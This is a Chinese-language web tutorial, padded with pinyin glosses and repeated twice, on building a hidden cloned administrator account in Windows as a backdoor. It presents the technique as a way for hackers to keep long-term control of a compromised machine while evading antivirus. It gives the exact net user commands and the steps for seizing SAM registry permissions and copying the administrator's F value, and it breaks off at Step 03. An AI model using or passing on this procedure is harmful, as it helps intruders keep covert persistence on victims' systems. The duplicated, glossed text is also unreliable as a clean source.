手工克隆Windows隱藏(cáng)帳戶
黑(hēi)客在入侵目標後,通常會在目標電腦上留下後門,以便長期控製這台電腦。可是後(hòu)門(mén)終歸(guī)是黑客工具(jù),是殺毒軟件的查殺目標之一(yī),可能殺毒(dú)軟件升級後後門(mén)就被刪除(chú)了。但是有(yǒu)一種(zhǒng)後門是(shì)永遠不會被殺毒軟件查殺(shā)的,就是隱(yǐn)藏的係(xì)統克隆帳戶。
★編輯(jí)提(tí)示(shì):
克隆帳戶是最隱(yǐn)蔽的後門(mén)
在Windows中(zhōng),每一個(gè)帳戶在注冊表中都有對(duì)應(yīng)的(de)鍵值,這(zhè)個鍵值影響著該帳戶的權限。當黑客在(zài)注冊表中(zhōng)動手腳複製鍵值後,就(jiù)可(kě)以(yǐ)將一個用戶權限的帳戶克隆成具(jù)有管理(lǐ)員權限的(de)帳戶(hù),並且將這個帳(zhàng)戶(hù)進行隱藏。隱藏(cáng)後的帳戶無論(lùn)是(shì)在“用(yòng)戶管理”還是“命令(lìng)提示符”中都(dōu)是(shì)不可見的。因(yīn)此一般的計算機管(guǎn)理員很少會發現隱藏帳戶,危害十分巨大。
用命令(lìng)行模式(shì)添加帳戶
點擊“開(kāi)始”→“運行”,輸(shū)入“cmd”運行(háng)“命令提示符”,輸(shū)入如下命令:net user test$ /add並回車,這樣就可以在係統中建立一(yī)個名為(wéi)test$的帳戶。繼續輸入:net localgroup administrators test$ /add並回(huí)車,這樣就(jiù)可以(yǐ)把test$帳戶提升到管理員權限。
●添(tiān)加一個隱藏帳戶
Step 01點擊(jī)“開始”→“運行”,輸入(rù)“regedt32.exe”後(hòu)回車,彈出“注冊(cè)表編輯器”。在regedt32.exe中來到“HKEY_LOCAL_MACHINESAMSAM”處(chù),點擊“編(biān)輯”菜單→“權限”,在彈(dàn)出(chū)的“SAM的權限”編輯窗口(kǒu)中選中“administrators”帳戶,在下方的權限設(shè)置處(chù)勾尋完全控(kòng)製”,完(wán)成後點擊“確(què)定(dìng)”即可(kě)。
●設置注(zhù)冊(cè)表(biǎo)操(cāo)作權限
Step 02在“運行(háng)”中輸(shū)入“regedit.exe”運行“注冊表編輯器”,定位(wèi)到“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames”處,點擊隱(yǐn)藏帳戶“test$”,在右(yòu)邊顯示的鍵(jiàn)值中的“類型”一項(xiàng)顯示為0x404,向上來到(dào)“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers”處(chù),可以找到“00000404”這(zhè)一(yī)項,這兩(liǎng)者是相互對應的,隱藏帳(zhàng)戶“test$”的所有(yǒu)信(xìn)息(xī)都在“00000404”這一(yī)項(xiàng)中(zhōng)。同(tóng)樣的,我們可以找到“administrator”帳戶所(suǒ)對應的項(xiàng)為“000001F4”。
Step 03將“test$”的(de)鍵值導出為(wéi)test$.reg,同時(shí)將“00000404”和(hé)“000001F4”項的F鍵(jiàn)值分別導出為user.reg,admin.reg。用“記事本”打開admin.reg,將其中“F”值後麵(miàn)的內容複製下(xià)來,替換user.reg中的“F”值內容,完成後保存。
黑客在入侵(qīn)目標後,通常會在目(mù)標電腦(nǎo)上留下後門,以便長期控製這台電腦。可是後(hòu)門終(zhōng)歸是(shì)黑(hēi)客工具,是殺(shā)毒(dú)軟件(jiàn)的查殺目標之一,可能(néng)殺毒軟(ruǎn)件升(shēng)級後後門就被刪(shān)除(chú)了。但(dàn)是有(yǒu)一種(zhǒng)後門(mén)是永遠不會(huì)被殺毒軟件查(chá)殺的,就是隱藏的係統克隆帳戶。
★編輯提示:
克隆帳戶是最隱蔽的後門
在Windows中,每(měi)一個帳戶在注冊表中都有對應的鍵值,這個鍵值影響著該帳戶的(de)權限。當黑(hēi)客(kè)在注冊表中動(dòng)手腳複製鍵(jiàn)值後,就可以將一(yī)個用戶權限的帳戶克隆成(chéng)具(jù)有(yǒu)管理員權限的帳戶,並且將這個(gè)帳(zhàng)戶進行隱藏。隱藏後的帳(zhàng)戶無論(lùn)是在(zài)“用戶管(guǎn)理(lǐ)”還是(shì)“命令(lìng)提示符(fú)”中都是(shì)不可見的。因此(cǐ)一般的計算機管理員很(hěn)少會(huì)發現隱(yǐn)藏帳(zhàng)戶,危害(hài)十分巨大。
用命令行模式添加帳戶(hù)
點擊“開始”→“運行”,輸入“cmd”運行“命令(lìng)提示符”,輸入如下命令:net user test$ /add並回車(chē),這樣(yàng)就(jiù)可以在係統中(zhōng)建立一個(gè)名為(wéi)test$的帳(zhàng)戶。繼(jì)續輸入:net localgroup administrators test$ /add並回車,這樣就可以把(bǎ)test$帳戶提升(shēng)到管理員(yuán)權限。
●添(tiān)加一(yī)個(gè)隱藏帳戶
Step 01點擊“開始”→“運(yùn)行”,輸入“regedt32.exe”後(hòu)回車(chē),彈出“注冊表(biǎo)編輯器”。在(zài)regedt32.exe中來到“HKEY_LOCAL_MACHINESAMSAM”處,點擊(jī)“編輯”菜單→“權限”,在彈(dàn)出的“SAM的權(quán)限”編輯(jí)窗(chuāng)口中選中(zhōng)“administrators”帳戶,在下方的權限設置處勾尋完全控(kòng)製”,完成後點擊“確定”即可。
●設置注冊表操作權(quán)限
Step 02在(zài)“運行”中輸入“regedit.exe”運行“注冊表編輯器(qì)”,定(dìng)位到“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames”處,點擊隱藏帳(zhàng)戶(hù)“test$”,在(zài)右邊顯示的鍵值中的“類型(xíng)”一(yī)項顯(xiǎn)示(shì)為(wéi)0x404,向上(shàng)來到“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers”處,可以找到“00000404”這一項,這兩者是相互(hù)對應的,隱(yǐn)藏帳戶“test$”的所有信息(xī)都在“00000404”這(zhè)一項中。同樣的(de),我(wǒ)們可以找到“administrator”帳戶所對應的項為“000001F4”。
Step 03將“test$”的鍵值導出(chū)為(wéi)test$.reg,同(tóng)時將“00000404”和“000001F4”項的F鍵值分別導出為(wéi)user.reg,admin.reg。用“記事本”打開admin.reg,將其中“F”值後麵的(de)內容複製下來,替換(huàn)user.reg中的“F”值內容,完成後保存。
關鍵詞:克隆Windows隱藏(cáng)帳(zhàng)戶
閱讀本文後您(nín)有什麽(me)感(gǎn)想? 已有 人給出評價!
- 0
- 0
- 0
- 0
- 0
- 0